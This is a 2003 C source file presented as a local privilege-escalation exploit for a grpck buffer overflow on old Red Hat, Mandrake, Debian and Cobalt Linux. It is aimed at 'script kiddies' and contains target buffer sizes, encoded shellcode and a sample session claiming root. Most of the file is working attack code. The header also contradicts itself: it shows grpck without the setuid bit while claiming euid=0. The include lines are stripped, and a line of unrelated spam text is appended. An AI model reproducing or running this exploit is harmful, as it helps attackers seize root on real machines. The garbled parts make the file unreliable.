/**** xgrpck.c /usr/sbin/grpck local buffer overflow exploit * **** when you've run xgrpck.c compiled, you'll have euid=0 in system **** could you send me please your opinion by e-mail or irc. :) * **** Users; * **** h4x0r & Script Kiddies & Lamers & Newbies for local buffer overflow exploit * **** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning **** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning **** Warning ! Warning ! Warning ! Warning ! Warning !Warning !Warning !Warning **** **** -sh-2.05b$ ls -la /usr/sbin/grpck **** -rwxr-xr-x 1 root root 22316 Aug 28 2001 /usr/sbin/grpck **** file is not suid +s mod /usr/sbin/grpck * * Vuln Sys ; * **** ******* Gentoo Linux *** * *** none Tested **** ******* SlackwareLinux *** * *** none Tested **** Testing RedHat Linux 7.3 & 8.0 r0073d **** Testing Cobalt Linux 6.x & 7.x r0073d **** Testing Mandrake Linux 8.1 & 8.2 r0073d **** Testing Debian Linux 2.1 & 2.2 r0073d **** Testing RedHat Linux 6.x all version none root **** Testing SuSE Linux x.x all version none root * **** Target buffers ; * **** RedHat 7.3 & 8.0 : 2517 **** Cobalt 6.x & 7.x : 2197 **** Mandrake 8.1 & 8.2 : 2391 **** Debian 2.1 & 2.2 : 2887 / u are change target buffer **** **** Usage ; * **** sh-2.05b$ /usr/sbin/grpck `perl -e '{print"1337"x2520}'` **** Segmentation fault (core dumped) **** sh-2.05b$ gcc -o xgrpck xgrpck.c **** sh-2.05b$ ./xgrpck **** xgrpck.c /usr/sbin/grpck local buffer overflow exploit **** manowaR@DALnet www.rsf.gen.tr Rammstein@secureroot.com * **** w00w0w0000 ! very nice a Day :-D **** Buffer: 2520 **** sh-2.05b# **** sh-2.05b# uname -a **** Linux localhost 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 GNU/Linux **** sh-2.05b# cat /etc/redhat-release **** Red Hat Linux release 8.0 (Psyche) **** sh-2.05b# id **** uid=513(scan) gid=513 euid=0(root) groups=1(staff) * * manowaR@DALnet www.rsf.gen.tr e-mail : Rammstein@secureroot.com * * 10 December 2003 05:13 * Greetz: xmax , irc.ulak.net #root my Channel & my Brothers :PcKiLLeR - Avicenna - Pink-cashmere etc ... * */ #include #include #include #include /* sh33lc0d3 by xmax@EFnet*/ char sh33lc0d3[] = "\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\x46\x03\x30" "\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\x08\x31\xc0" "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56" "\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\xff\xff\xff" "\x2f\x32\x39\x3e\x2f\x43\x38"; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char **argv) { int bsize = 2517; /* buffer size for Redhat Linux */ unsigned long addr; char *buff; int i; if (bsize % 6 != 0) { bsize = bsize + 6 - (bsize % 6); } buff = (char *)malloc(bsize); addr = get_sp(); system("clear"); fprintf(stderr, "xgrpck.c /usr/sbin/grpck local buffer overflow exploit\n"); fprintf(stderr, "manowaR@DALnet www.rsf.gen.tr Rammstein@secureroot.com\n\n", addr); fprintf(stderr, "w00w0w0000 ! very nice a Day :-D \n", addr); fprintf(stderr, "Buffer: %d\n", bsize); for(i = 0; i < bsize; i++) { *(long *)&buff[i] = 0xbfffe5bc; } *(long *)&buff[bsize - 6] = addr; memcpy(buff + bsize - strlen(sh33lc0d3) - 8, sh33lc0d3, strlen(sh33lc0d3)); execl("/usr/sbin/grpck", "grpck", buff, NULL); return 0; } /* manowaR */

亚洲欧美在线